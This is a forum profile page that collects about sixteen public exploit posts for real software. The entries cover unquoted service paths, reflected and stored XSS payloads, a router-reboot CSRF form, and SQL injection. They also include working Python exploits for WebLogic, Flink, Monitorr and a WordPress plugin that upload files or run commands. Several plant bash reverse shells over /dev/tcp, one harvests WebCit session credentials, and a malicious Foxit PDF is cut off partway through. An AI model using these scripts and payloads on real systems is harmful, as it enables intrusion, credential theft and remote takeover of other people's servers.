
Everything posted by HireHackking
-
Exploit - EPSON 1.124 - 'seksmdb.exe' Unquoted Service Path
# Exploit Title: EPSON 1.124 - 'seksmdb.exe' Unquoted Service Path
# Discovery by: İsmail Önder Kaya
# Discovery Date: 2020-10-27
# Vendor Homepage: https://www.epson.co.uk/support?productID=10820&os=22#drivers_and_manuals
# Tested Version: 1.124
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64

# Step to discover Unquoted Service Path:

C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "EPSON_P2B" | findstr /i /v """

SEcnStatutsDatabase   SENADB   C:\Program Files (x86)\EPSON_P2B\Printer Software\Status Monitor\seksmdb.exe   Auto

# Service info:

C:\>sc qc SENADB
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: SENADB
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files (x86)\EPSON_P2B\Printer Software\Status Monitor\seksmdb.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : SEcnStatutsDatabase
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
-
Program Access Controller v1.2.0.0 - 'PACService.exe' Unquoted Service Path
# Exploit Title: Program Access Controller v1.2.0.0 - 'PACService.exe' Unquoted Service Path
# Date: 2020-8-25
# Exploit Author: Mohammed Alshehri
# Vendor Homepage: https://www.gearboxcomputers.com/
# Software Link: https://www.gearboxcomputers.com/files/ProgramAccessController.exe
# Version: 1.2.0.0
# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763

# Service info:

C:\Users\m507>sc qc PACSvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: PACSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Program Access Controller\PACService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : PAC Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\m507>

# Exploit:
This vulnerability could permit executing code during startup or reboot with escalated privileges.
-
IP Watcher v3.0.0.30 - 'PACService.exe' Unquoted Service Path
# Exploit Title: IP Watcher v3.0.0.30 - 'PACService.exe' Unquoted Service Path
# Date: 2020-8-25
# Exploit Author: Mohammed Alshehri
# Vendor Homepage: https://www.gearboxcomputers.com/
# Software Link: https://www.gearboxcomputers.com/files/IPWatcherSetup.exe
# Version: 3.0.0.30
# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763

# Service info:

C:\Users\m507>sc qc IPWatcherSvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: IPWatcherSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\IP Watcher\IPWatcherService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : IPWatcherService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\m507>

# Exploit:
This vulnerability could permit executing code during startup or reboot with escalated privileges.
-
Prey 1.9.6 - "CronService" Unquoted Service Path
# Exploit Title: Prey 1.9.6 - "CronService" Unquoted Service Path
# Discovery by: Ömer Tuygun
# Discovery Date: 16.10.2020
# Vendor Homepage: https://preyproject.com/
# Software Link: https://preyproject.com/download/
# Tested Version: 1.9.6
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es

# Description:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

C:\Users>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Prey" | findstr /i /v """

Cron Service   CronService   C:\Program Files (x86)\Prey\wpxsvc.exe   Auto

C:\Users>sc qc CronService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: CronService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Prey\wpxsvc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Cron Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users>
-
Mailman 1.x > 2.1.23 - Cross Site Scripting (XSS)
# Title: Mailman 1.x > 2.1.23 - Cross Site Scripting (XSS)
# Type: Reflected XSS
# Software: Mailman
# Version: >=1.x <= 2.1.23
# Vendor Homepage: https://www.list.org
# Original link: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5950
# POC Author: Valerio Alessandroni
# Date: 28/10/2020
# Description: Cross-site scripting (XSS) vulnerability in the web UI in Mailman before 2.1.26 allows remote attackers to inject arbitrary web script or HTML via a user-options URL.
#
# https://127.0.0.1/cgi-bin/mailman/options/[LIST]/[EMAIL][XSS]
# where [LIST] is a valid list, [EMAIL] is a valid email and [XSS] is the payload
#
# For this POC I used the following payload
# CVE: CVE-2018-5950

"accesskey%3d"x"onclick%3d"alert`XSS`"

# Because the payload is loaded inside a HIDDEN INPUT TYPE, until today the only way to trigger the malicious code is via the accesskey attribute.
# A URL-encoded version of the payload is

%22%61%63%63%65%73%73%6b%65%79%3d%22%78%22%6f%6e%63%6c%69%63%6b%3d%22%61%6c%65%72%74%60%58%53%53%60%22

# URL Example:

https://127.0.0.1/cgi-bin/mailman/options/list_name/test@test.com%22%61%63%63%65%73%73%6b%65%79%3d%22%78%22%6f%6e%63%6c%69%63%6b%3d%22%61%6c%65%72%74%60%58%53%53%60%22

# In order to trigger the alert, the victim has to press the following buttons ALT+SHIFT+X
# where X is an arbitrary button inserted as accesskey attribute in the payload.
-
Online Examination System 1.0 - 'name' Stored Cross Site Scripting
# Exploit Title: Online examination system 1.0 - 'name' Stored Cross Site Scripting
# Date: 29/10/2020
# Exploit Author: Nikhil Kumar (https://www.linkedin.com/in/nikhil-kumar-4b9443166/)
# Vendor Homepage: https://github.com/projectworldsofficial/online-examination-systen-in-php
# Software Link: https://github.com/projectworldsofficial/online-examination-systen-in-php.git
# Version: 1.0
# Tested On: Ubuntu 18 + Xampp-linux-x64-5.5.38-3

Step 1: Open the URL http://localhost/online-examination-systen-in-php/index.php and fill the sign up form
http://localhost/exam_system/sign.php?q=account.php

Step 2: Use payload ><script>alert(document.cookie)</script> in "name=" field

Malicious Request
-----------------

POST /exam_system/sign.php?q=account.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 157
Origin: http://localhost
Connection: close
Referer: http://localhost/exam_system/index.php
Cookie: security_level=1; PHPSESSID=kue9gcj3bs2329e8mctsokaod7
Upgrade-Insecure-Requests: 1

name=test><script>alert(document.cookie)</script>&gender=M&college=test&email=test@test.com&mob=8888888888&password=123456&cpassword=123456

Step 3: The cookie will be reflected each time a user logs in with their credentials
-
Genexis Platinum-4410 P4410-V2-1.28 - Cross Site Request Forgery to Reboot
# Exploit Title: Genexis Platinum-4410 P4410-V2-1.28 - Cross Site Request Forgery to Reboot
# Date: 10/28/2020
# Exploit Author: Mohammed Farhan
# Vendor Homepage: https://genexis.co.in/product/ont/
# Version: Platinum-4410 Software version - P4410-V2-1.28
# Tested on: Windows 10
# Author Contact: https://twitter.com/farhankn

Vulnerability Details
======================

Login to the application
Create an HTML file using the below mentioned code

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.1.1/cgi-bin/mag-reset.asp" method="POST">
      <input type="hidden" name="rebootflag" value="1" />
      <input type="hidden" name="restoreFlag" value="1" />
      <input type="hidden" name="isCUCSupport" value="0" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Open the HTML page in the browser and Click on "Submit Request"
Note that modem reboots after the same
-
WebLogic Server 10.3.6.0.0 / 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 - Unauthenticated RCE via GET request
#!/usr/bin/python3
# Exploit Title: Oracle WebLogic Server 10.3.6.0.0 / 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 - Unauthenticated RCE via GET request
# Exploit Author: Nguyen Jang
# CVE: CVE-2020-14882
# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html
# Software Link: https://www.oracle.com/technetwork/middleware/downloads/index.html
# More Info: https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf

import requests
import sys
from urllib3.exceptions import InsecureRequestWarning

if len(sys.argv) != 3:
    print("[+] WebLogic Unauthenticated RCE via GET request")
    print("[+] Usage : python3 exploit.py http(s)://target:7001 command")
    print("[+] Example1 : python3 exploit.py http(s)://target:7001 \"nslookup your_Domain\"")
    print("[+] Example2 : python3 exploit.py http(s)://target:7001 \"powershell.exe -c Invoke-WebRequest -Uri http://your_listener\"")
    exit()

target = sys.argv[1]
command = sys.argv[2]

request = requests.session()
headers = {'Content-type': 'application/x-www-form-urlencoded; charset=utf-8'}

print("[+] Sending GET Request ....")
GET_Request = request.get(target + "/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"java.lang.Runtime.getRuntime().exec('" + command + "');\");", verify=False, headers=headers)
print("[+] Done !!")
-
CSE Bookstore 1.0 - 'quantity' Persistent Cross-site Scripting
# Exploit Title: CSE Bookstore 1.0 - 'quantity' Persistent Cross-site Scripting
# Date: 30/10/2020
# Exploit Author: Vyshnav NK
# Vendor Homepage: https://projectworlds.in/
# Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
# Version: 1.0
# Tested on: Windows 10 and Windows 7

CSE Bookstore is vulnerable to a Persistent Cross-site scripting on Checkout.php and cartp.php, where a user is able to add the quantity as an XSS payload; once added, each time the MyCart option is clicked it triggers as a stored one.

The below URL can be accessed by a User

URL : http://localhost/php/checkout.php and http://localhost/php/cart.php

Payload : "><svg/onload=alert(5)>

Insert XSS Payload into Quantity Section
-
Citadel WebCit < 926 - Session Hijacking Exploit
# Exploit Title: Citadel WebCit < 926 - Session Hijacking Exploit
# Exploit Author: Simone Quatrini
# Version: 926

#!/usr/bin/env python3

import argparse
import requests
import time
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

parser = argparse.ArgumentParser(description="Webcit <= 926 Session Hijacking")
parser.add_argument('--url', action='store', dest='url', required=True, help="Full URL and port e.g.: http://192.168.1.111:8080/")
parser.add_argument('--verbose', '-v', action='store_true', required=False, help="Shows the full response")
args = parser.parse_args()

url = args.url
verbose = args.verbose

def check_endpoint(url):
    headers = {'User-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'}
    response = requests.get(url+'/dotskip?room=_BASEROOM_', headers=headers, verify=False)
    if response.status_code == 200:
        print("[+] WebCit is reachable\n")
    else:
        print("\n[-] WebCit response code: ", response.status_code)
        sys.exit()

def harvesting(url, verbose):
    # Current timestamp
    epoch_time = int(time.time())
    # The harvesting technique only searches for users that logged in within the last ~20 minutes.
    # Increase the search_back_in variable's number to search even further back (it will require more time and requests)
    # Also, make sure that you're using the same timezone as the server
    search_back_in = 999
    print("[/] Credential harvesting in progress...")
    while search_back_in > 0:
        payload = str(epoch_time-search_back_in)+'|||||'
        payload_hex = payload.encode(encoding='utf_8').hex()
        headers = {'User-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36','Cookie':'webcit='+payload_hex+''}
        response = requests.get(url+'/dotskip?room=_BASEROOM_', headers=headers, verify=False)
        try:
            cookievalue = bytes.fromhex(response.cookies['webcit'])
            cookievalue = cookievalue.decode(encoding='utf_8')
            parts = cookievalue.split('|')
            if ((len(parts[1])) and (len(parts[2]))):
                print("Credential found: ", cookievalue)
        except:
            if(verbose):
                print("[-] Invalid returned cookie value, skipping")
        search_back_in = search_back_in - 1
    print("[+] Credential harvesting done.")

# Default actions if only '--url' is passed
check_endpoint(url)
harvesting(url, verbose)
-
DedeCMS v.5.8 - "keyword" Cross-Site Scripting
# Exploit Title: DedeCMS v.5.8 - "keyword" Cross-Site Scripting
# Date: 2020-07-27
# Exploit Author: Noth
# Vendor Homepage: https://github.com/dedetech/DedeCMSv5
# Software Link: https://github.com/dedetech/DedeCMSv5
# Version: v.5.8
# CVE : CVE-2020-27533

A Cross Site Scripting (XSS) issue was discovered in the search feature of DedeCMS v.5.8 that allows malicious users to inject code into web pages, and other users will be affected when viewing web pages.

PoC :

POST /DedeCMSv5-master/src/dede/action_search.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/DedeCMSv5-master/src/dede/
Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=dgj9gs48q9nbrckdq0ei5grjd7; _csrf_name_7ac3ea0e=8a824367d97bb8f984d4af7a1ad11308; _csrf_name_7ac3ea0e__ckMd5=c692dd4f707ea756; DedeUserID=1; DedeUserID__ckMd5=7e44b1ee92d784aa; DedeLoginTime=1603530632; DedeLoginTime__ckMd5=69967c5a8db15fb4; dede_csrf_token=80866e4429220e784f2514d38de9a5ea; dede_csrf_token__ckMd5=de396c60d5d75d93
Upgrade-Insecure-Requests: 1

keyword="><script>alert(1)</script>
-
Simple College Website 1.0 - 'username' SQL Injection / Remote Code Execution
# Exploit Title: Simple College Website 1.0 - SQL Injection / Remote Code Execution
# Date: 30-10-2020
# Exploit Author: yunaranyancat
# Vendor Homepage: https://www.sourcecodester.com/php/14548/simple-college-website-using-htmlphpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-college-website.zip
# Version: 1.0
# Tested on: Ubuntu 18.04 + XAMPP 7.4.11
# CVE ID : N/A

# replace revshell.php with your own php reverse shell
# change [TARGET URL] to target URL or IP address
# setup your netcat listener for sum good ol shellz

#!/usr/bin/python3

import requests
import time

def sqli_admin():
    s = requests.Session()
    data = {"username":"admin' or 1=1#","password":"hacked"}
    adminlogin = "http://[TARGET URL]/college_website/admin/ajax.php?action=login"
    s.post(adminlogin,data=data)
    return s

def trigger_rce(session):
    starttime = int(time.time())
    multipart_form_data = {
        "name": ("College of Hackers"),
        "email": ("test@test.com"),
        "contact" : ("+11111111111"),
        "about" : ("Nothing much about it"),
        "img" : ("revshell.php", open("revshell.php", "rb"))
    }
    session.post("http://[TARGET URL]/alumni/admin/ajax.php?action=save_settings", files=multipart_form_data)
    get_shell(starttime-100,starttime+100,session)

def get_shell(start,end,session):
    for i in range(start,end):
        session.get("http://[TARGET URL]/alumni/admin/assets/uploads/"+str(i)+"_revshell.php")

def main():
    session = sqli_admin()
    trigger_rce(session)

if __name__ == '__main__':
    main()
-
Online Job Portal 1.0 - 'userid' SQL Injection
# Exploit Title: Online Job Portal 1.0 - 'userid' SQL Injection
# Google Dork: N/A
# Date: 2020/10/28
# Exploit Author: Akıner Kısa
# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip
# Version: 1.0
# Tested on: XAMPP
# CVE : N/A

# Vulnerable URL: http://localhost/jobportal/Admin/EditUser.php?UserId='

Proof of Concept:

1. See vulnerable url.
2. Open sqlmap and use " sqlmap -u "http://localhost/jobportal/Admin/EditUser.php?UserId='" --dbs " command.
-
WordPress Plugin Simple File List 4.2.2 - Arbitrary File Upload
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Exploit Title: Wordpress Plugin Simple File List 4.2.2 - Arbitrary File Upload
# Date: 2020-11-01
# Exploit Author: H4rk3nz0 based off exploit by coiffeur
# Original Exploit: https://www.exploit-db.com/exploits/48349
# Vendor Homepage: https://simplefilelist.com/
# Software Link: https://wordpress.org/plugins/simple-file-list/
# Version: Wordpress v5.4 Simple File List v4.2.2

import requests
import random
import hashlib
import sys
import os
import urllib3

urllib3.disable_warnings()

dir_path = '/wp-content/uploads/simple-file-list/'
upload_path = '/wp-content/plugins/simple-file-list/ee-upload-engine.php'
move_path = '/wp-content/plugins/simple-file-list/ee-file-engine.php'

def usage():
    banner = """
NAME: Wordpress v5.4 Simple File List v4.2.2, pre-auth RCE
SYNOPSIS: python wp_simple_file_list_4.2.2.py <URL>
AUTHOR: coiffeur
"""
    print(banner)

def generate():
    filename = f'{random.randint(0, 10000)}.png'
    password = hashlib.md5(bytearray(random.getrandbits(8) for _ in range(20))).hexdigest()
    # the generated file is written under the random name so upload() can read it back
    with open(f'{filename}', 'wb') as f:
        payload = '<?php passthru("bash -i >& /dev/tcp/192.168.1.1/4444 0>&1"); ?>'
        f.write(payload.encode())
    print(f'[ ] File {filename} generated with password: {password}')
    return filename, password

def upload(url, filename):
    files = {'file': (filename, open(filename, 'rb'), 'image/png')}
    datas = {'eeSFL_ID': 1, 'eeSFL_FileUploadDir': dir_path, 'eeSFL_Timestamp': 1587258885, 'eeSFL_Token': 'ba288252629a5399759b6fde1e205bc2'}
    r = requests.post(url=f'{url}{upload_path}', data=datas, files=files, verify=False)
    r = requests.get(url=f'{url}{dir_path}{filename}', verify=False)
    if r.status_code == 200:
        print(f'[ ] File uploaded at {url}{dir_path}{filename}')
        os.remove(filename)
    else:
        print(f'[*] Failed to upload {filename}')
        exit(-1)
    return filename

def move(url, filename):
    new_filename = f'{filename.split(".")[0]}.php'
    headers = {'Referer': f'{url}/wp-admin/admin.php?page=ee-simple-file-list&tab=file_list&eeListID=1', 'X-Requested-With': 'XMLHttpRequest'}
    datas = {'eeSFL_ID': 1, 'eeFileOld': filename, 'eeListFolder': '/', 'eeFileAction': f'Rename|{new_filename}'}
    r = requests.post(url=f'{url}{move_path}', data=datas, headers=headers, verify=False)
    if r.status_code == 200:
        print(f'[ ] File moved to {url}{dir_path}{new_filename}')
    else:
        print(f'[*] Failed to move {filename}')
        exit(-1)
    return new_filename

def main(url):
    file_to_upload, password = generate()
    uploaded_file = upload(url, file_to_upload)
    moved_file = move(url, uploaded_file)
    if moved_file:
        print(f'[+] Exploit seem to work.\n[*] Confirming ...')
        datas = {'password': password, 'cmd': 'phpinfo();'}
        r = requests.post(url=f'{url}{dir_path}{moved_file}', data=datas, verify=False)
        if r.status_code == 200 and r.text.find('php') != -1:
            print('[+] Exploit work !')
            print(f'\tURL: {url}{dir_path}{moved_file}')
            print(f'\tPassword: {password}')

if __name__ == "__main__":
    if (len(sys.argv) < 2):
        usage()
        exit(-1)
    main(sys.argv[1])
-
Apache Flink 1.9.x - File Upload RCE (Unauthenticated)
#!/usr/bin/env python3
# _*_ coding: utf-8 _*_
# Exploit Title: Apache Flink 1.9.x - File Upload RCE (Unauthenticated)
# Google Dork: None
# Date: 2020.11.01
# Exploit Author: bigger.wing
# Vendor Homepage: https://flink.apache.org/
# Software Link: https://flink.apache.org/downloads.html
# Version: 1.9.x
# Tested on: Centos7.x, 1.9.1
# CVE: None

import io
import re
import sys
import base64
import requests


class FlinkRCECheck:
    def __init__(self, url):
        self.url = url
        self.timeout = 10
        self.upload_file = 'rce_check_from_sec.jar'
        self.headers = {
            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) '
                          'Chrome/61.0 Safari/537.36'
        }

    @property
    def get_version(self):
        url = '%s/%s' % (self.url, 'config')
        try:
            res = requests.get(url, headers=self.headers, timeout=self.timeout, verify=False)
            version = res.json().get('flink-version')
        except:
            version = 'unknown'
        return version

    @property
    def jar_check(self):
        url = '%s/%s' % (self.url, 'jars')
        jar_list = []
        try:
            res = requests.get(url, headers=self.headers, verify=False, timeout=self.timeout)
            if res.status_code == 200 and 'application/json' in res.headers.get('Content-Type', ''):
                res = res.json()
                for file in res['files']:
                    if file['id'].endswith(self.upload_file):
                        jar_list.append(file['id'])
        except Exception as e:
            pass
        return jar_list

    @property
    def jar_upload(self):
        url = '%s/%s' % (self.url, 'jars/upload')
        jar_content = base64.b64decode('UEsDBBQACAgIACJ1bU8AAAAAAAAAAAAAAAAUAAQATUVUQS1JTkYvTUFOSUZFU1QuTUb+ygAA803My'
                                       '0xLLS7RDUstKs7Mz7NSMNQz4OXyTczM03XOSSwutlJwrUhNLi1J5eXi5QIAUEsHCIiKCL8wAAAALg'
                                       'AAAFBLAwQKAAAIAAAidW1PAAAAAAAAAAAAAAAACQAAAE1FVEEtSU5GL1BLAwQUAAgICAAidW1PAAA'
                                       'AAAAAAAAAAAAADQAAAEV4ZWN1dGUuY2xhc3ONVet2E1UU/k4yyUwmQy+TQlsQBdSStqSxiIotIlAK'
                                       'VkJbSa0G8DKZHpPTJjNhLjTVCvoQ/ugT8MsfqCtx0aUPwEOx3Gdo09KGtUzW7H3O3vvbt7PPzPMXz'
                                       '/4FMIlfdbyDyxo+1XBFx1Vc05HCjIbrks+quKHipobPNMzp0PC5hlsqChpu6+jBvCQLGhal6gsVd3'
                                       'QUsaRjAF9qWJb8K0m+lqQkyd0URbin4r6OkzLoN5J/K8l3Or6HpaKswmZIXhKOCC4zxLOjywzKjLv'
                                       'CGXoLwuHzYb3MvSWrXCOJWXBtq7ZseULud4RKUBU+Q6ow2+R2GPBpEtUt4TAcy94rrFoPrXzNcir5'
                                       'YuAJpzItA7AGw/F9qkXPtbnvXwtFbYV75CDeCDZkuENo8m15FQqX6eKaHLuEtesrtJI2h0NIG7ujC'
                                       'QNRyxdty3GiqPps0+aNQLiOr4J86EU39Gx+Q8gyjZ3yJiTSwLsYYQCD6voTjlXnKriBH1AxUIWgJN'
                                       'aFY2AVawxDr6uToe9gCeSPsp/gTQoYy9syTI5k+bJw8n6VkogAws2/zCkVKcqWX5WWNQN1UNtjOQK'
                                       '6oB73H6pSxQMDHnxpH5Dp/asGQjw0sA7KtwlhYAMjBn7ETwyDB9PrJB7fvLJpYBM/G3gEoeKxgV9Q'
                                       'o0x3mvRKaQvlVW5TsMyeqNPoV3uw4Qe8zpCu8IBa1eCenIKRbJch6nb46cAtuOvcm7F8SmAg29VIs'
                                       '10noOmk8Tix3/FM1fKK/EHIHZtPj95lONotLM1ukjeFH/jRXSGzhB9YXiDNR7tOW/8hIUMP1TfnNM'
                                       'KA3HKLCh7cBdPJ7lMQfCjbVSETMUKfX+c1UReBPJKzr2/TgTFXq5Y/z5uUtOJELGHXXNmyuBvKSjo'
                                       'RF8nJXipJq9HgDl2L3P86kL3LrAXu7nRnurim+A25w2m8Te9G+YvRxaILRvQs7fLE6a4hMdYGexqp'
                                       's0STkZBhlKjx0gBjGCeewjnkyIrAbInskiT7y4wVxuLnb5vxv6G0kDCTLahbOLUNrZT8B6lS3NSLJ'
                                       'cVMF0uJc8U2jPknuGAemVK20VMye9voa6F/C6rZK0W7mGFFYswOJtdCRuoHSsMU5Ggbx8zBFoamEs'
                                       'OJFoa3kJb8+BMo4wW5OvEH3tjGyVIbb5pvtXBqnJ5o0cLpFs7s1fohjhCN01+BSvUMEr1AdV6Ejpt'
                                       'I4xbpOXqxhj66kP34DSb+RCbqzR36WEwScoIaGSdEDu/RXpE9wXm8H/l9St4m5dsMv+MDWsXI28IO'
                                       'Yg1zFP8jQjwifhEfU5+nCKWQ/TQ9l6IsP/kPUEsHCEEOnKXWAwAA4gYAAFBLAQIUABQACAgIACJ1b'
                                       'U+Iigi/MAAAAC4AAAAUAAQAAAAAAAAAAAAAAAAAAABNRVRBLUlORi9NQU5JRkVTVC5NRv7KAABQSw'
                                       'ECCgAKAAAIAAAidW1PAAAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAB2AAAATUVUQS1JTkYvUEsBAhQ'
                                       'AFAAICAgAInVtT0EOnKXWAwAA4gYAAA0AAAAAAAAAAAAAAAAAnQAAAEV4ZWN1dGUuY2xhc3NQSwUG'
                                       'AAAAAAMAAwC4AAAArgQAAAAA')
        files = {'jarfile': (self.upload_file, io.BytesIO(jar_content), 'application/octet-stream')}
        try:
            res = requests.post(url, headers=self.headers, files=files, timeout=self.timeout, verify=False)
            file_id = res.json()['filename'].split('/')[-1]
            return file_id
        except Exception as e:
            res = False
        return res

    @property
    # delete history jar packages
    def jar_delete(self):
        for jar_name in self.jar_check:
            url = '%s//jars/%s' % (self.url, jar_name)
            try:
                requests.delete(url=url, headers=self.headers, timeout=self.timeout, verify=False)
            except:
                pass
        return

    def rce(self, command):
        jar_file = self.jar_upload
        try:
            execute_cmd_url = '%s/jars/%s/run?entry-class=Execute&program-args="%s"' % (self.url, jar_file, command)
            res = requests.post(url=execute_cmd_url, headers=self.headers, timeout=self.timeout, verify=False)
            res = re.findall('\|@\|(.*?)\|@\|', res.text)[0][0:-2]
            if res:
                print('rce command "%s" exec result: %s' % (command, res))
                state = 1
                msg = '%s rce success' % self.url
            else:
                state = 0
                msg = '%s rce failed' % self.url
        except:
            state = 0
            msg = '%s rce failed' % self.url
        delete = self.jar_delete
        return {'state': state, 'version': self.get_version, 'msg': msg}


if __name__ == '__main__':
    usage = 'python3 script.py ip port command'
    if len(sys.argv) != 4:
        print('simple usage: %s' % usage)
    else:
        ip = sys.argv[1]
        port = sys.argv[2]
        command = sys.argv[3]
        url = 'http://%s:%s' % (ip, port)
        res = FlinkRCECheck(url=url).rce(command=command)
        print(res)
-
Monitorr 1.7.6m - Remote Code Execution (Unauthenticated)
#!/usr/bin/python
# -*- coding: UTF-8 -*-
# Exploit Title: Monitorr 1.7.6m - Remote Code Execution (Unauthenticated)
# Date: September 12, 2020
# Exploit Author: Lyhin's Lab
# Detailed Bug Description: https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/
# Software Link: https://github.com/Monitorr/Monitorr
# Version: 1.7.6m
# Tested on: Ubuntu 19

import requests
import os
import sys

if len (sys.argv) != 4:
    print ("specify params in format: python " + sys.argv[0] + " target_url lhost lport")
else:
    url = sys.argv[1] + "/assets/php/upload.php"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/plain, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------31046105003900160576454225745", "Origin": sys.argv[1], "Connection": "close", "Referer": sys.argv[1]}
    data = "-----------------------------31046105003900160576454225745\r\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"she_ll.php\"\r\nContent-Type: image/gif\r\n\r\nGIF89a213213123<?php shell_exec(\"/bin/bash -c 'bash -i >& /dev/tcp/"+sys.argv[2] +"/" + sys.argv[3] + " 0>&1'\");\r\n\r\n-----------------------------31046105003900160576454225745--\r\n"
    requests.post(url, headers=headers, data=data)

    print ("A shell script should be uploaded. Now we try to execute it")

    url = sys.argv[1] + "/assets/data/usrimg/she_ll.php"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
    requests.get(url, headers=headers)
-
Foxit Reader 9.7.1 - Remote Command Execution (Javascript API)
# Exploit Title: Foxit Reader 9.7.1 - Remote Command Execution (Javascript API)
# Exploit Author: Nassim Asrir
# Vendor Homepage: https://www.foxitsoftware.com/
# Description: Foxit Reader before 10.0 allows Remote Command Execution via the unsafe app.opencPDFWebPage JavaScript API which allows an attacker to execute local files on the file system and bypass the security dialog.
# CVE-2020-14425

The exploit process needs user interaction (opening the PDF).

+ Process continuation

#POC

%PDF-1.4
%ÓôÌá
1 0 obj
<<
/CreationDate(D:20200821171007+02'00')
/Title(Hi, Can you see me ?)
/Creator(AnonymousUser)
>>
endobj
2 0 obj
<<
/Type/Catalog
/Pages 3 0 R
/Names << /JavaScript 10 0 R >>
>>
endobj
3 0 obj
<<
/Type/Pages
/Count 1
/Kids[4 0 R]
>>
endobj
4 0 obj
<<
/Type/Page
/MediaBox[0 0 595 842]
/Parent 3 0 R
/Contents 5 0 R
/Resources
<<
/ProcSet [/PDF/Text/ImageB/ImageC/ImageI]
/ExtGState << /GS0 6 0 R >>
/Font << /F0 8 0 R >>
>>
/Group
<<
/CS/DeviceRGB
/S/Transparency
/I false
/K false
>>
